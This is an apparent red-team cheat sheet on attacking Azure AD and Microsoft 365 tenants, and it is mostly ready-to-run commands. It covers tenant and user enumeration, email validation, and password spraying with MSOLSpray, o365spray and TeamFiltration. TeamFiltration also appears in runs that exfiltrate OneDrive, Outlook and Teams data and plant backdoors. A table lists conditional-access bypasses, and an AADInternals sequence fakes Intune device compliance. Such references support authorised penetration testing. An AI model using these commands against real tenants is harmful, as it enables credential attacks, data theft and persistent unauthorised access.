Skip to content

Azure AD Enumerate

Azure AD - Collectors

  • Microsoft Portals - Microsoft Administrator Sites
  • ROADTool - A collection of Azure AD tools for offensive and defensive security purposes
    roadrecon auth --access-token eyJ0eXA...
    roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
    roadrecon gather
    roadrecon gui
  • BloodHoundAD/AzureHound - Azure Data Exporter for BloodHound
    ./azurehound --refresh-token <refresh-token> list --tenant "<target-tenant-id>" -o output.json
    ./azurehound -u "<username>" -p "<password>" list groups --tenant "<tenant>"
    ./azurehound -j "<jwt>" list users --tenant "<tenant>"
  • BloodHoundAD/BARK - BloodHound Attack Research Kit
    . .\BARK.ps1
    $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "" -password "MyVeryCoolPassword" -TenantID ""
    $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID ""
    $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
  • dafthack/GraphRunner - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
    Invoke-GraphRecon -Tokens $tokens -PermissionEnum
    Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
    Invoke-DumpApps -Tokens $tokens
    Get-DynamicGroups -Tokens $tokens
  • NetSPI/MicroBurst - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
    PS C:> Import-Module .\MicroBurst.psm1
    PS C:> Import-Module .\Get-AzureDomainInfo.ps1
    PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
  • hausec/PowerZure - PowerShell framework to assess Azure security
    PS C:> Import-Module .\Powerzure.psd1
    PS C:> Set-Subscription -Id [idgoeshere]
    PS C:> Get-AzureTarget
    PS C:> Get-AzureInTuneScript
    PS C:> Show-AzureKeyVaultContent -All
  • Flangvik/TeamFiltration - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad 
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
  • Azure/StormSpotter - ⚠ This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
  • nccgroup/Azucar - ⚠ This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
  • FSecureLABS/Azurite Explorer - ⚠ This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
  • cyberark/SkyArk - ⚠ This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.

Azure AD - User Enumeration

Enumerate Tenant Informations

  • Federation with Azure AD or O365
    Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME><USER>@<DOMAIN>&xml=1<TENANT NAME>
  • Get the Tenant ID
    Get-AADIntTenantID -Domain <TENANT NAME><DOMAIN>/.well-known/openid-configuration<TENANT NAME>

Enumerate from a Guest Account

powerpwn recon --tenant {tenantId} --cache-path {path}
powerpwn dump -tenant {tenantId} --cache-path {path}
powerpwn gui --cache-path {path}

Enumerate Emails

By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.

  • Validate email
    PS> C:\Python27\python.exe C:\Tools\o365creeper\ -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
    admin@<TENANT NAME>   - VALID
    root@<TENANT NAME>    - INVALID
    test@<TENANT NAME>    - VALID
    contact@<TENANT NAME> - INVALID
  • Extract email lists with a valid credentials :
    Install-Module MSOnline
    Install-Module AzureAD
    .\o365recon.ps1 -azure

Password Spraying

The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds.

  • dafthack/MSOLSpray
    PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
    PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
    PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
    PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
  • 0xZDH/o365spray
    o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain
  • Flangvik/TeamFiltration
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
    TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00

Azure Services Enumeration

Enumerate Tenant Domains

Extract openly available information for the given tenant:

Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "" | Format-Table

Enumerate Azure Subdomains

PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME> Microsoft Hosted Domain

Enumerate Services

  • Using Az Powershell module

    # Enumerate resources
    PS Az> Get-AzResource
    # List all VM's the user has access to
    PS Az> Get-AzVM 
    # Get all webapps
    PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
    # Get all function apps
    PS Az> Get-AzFunctionApp
    # List all storage accounts
    PS Az> Get-AzStorageAccount
    # List all keyvaults
    PS Az> Get-AzKeyVault
    # Get all application objects registered using the current tenant
    PS AzureAD> Get-AzureADApplication -All $true
    # Enumerate role assignments
    PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
    PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>
    # Check AppID Alternative Names/Display Name 
    PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl

  • Using az cli

    PS> az vm list
    PS> az vm list --query "[].[name]" -o table
    PS> az webapp list
    PS> az functionapp list --query "[].[name]" -o table
    PS> az storage account list
    PS> az keyvault list

Conditional Access Policy

Conditional Access is used to restrict access to resources to compliant devices only.

  • Enumerate Conditional Access Policies: roadrecon plugin policies (query the local database)
CAP Bypass
Location / IP ranges Corporate VPN, Guest Wifi
Platform requirement User-Agent switcher (Android, PS4, Linux, ...)
Protocol requirement Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP)
Azure AD Joined Device Try to join a VM (Work Access)
Compliant Device (Intune) Fake device compliance
Device requirement /
Legacy Protocols /
Domain Joined /

Bypassing conditional access by faking device compliance

# AAD Internals - Making your device compliant
# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache
# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
# Marking device compliant - option 1: Registering device to Intune
# Get an access token for Intune MDM and save to cache (prompts for credentials)
Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache 
# Join the device to Intune
Join-AADIntDeviceToIntune -DeviceName "SixByFour"
# Start the call back
Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"

Multi Factor Authentication

  • dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services
    Import-Module .\MFASweep.ps1
    Invoke-MFASweep -Username -Password Winter2020
    Invoke-MFASweep -Username -Password Winter2020 -Recon -IncludeADFS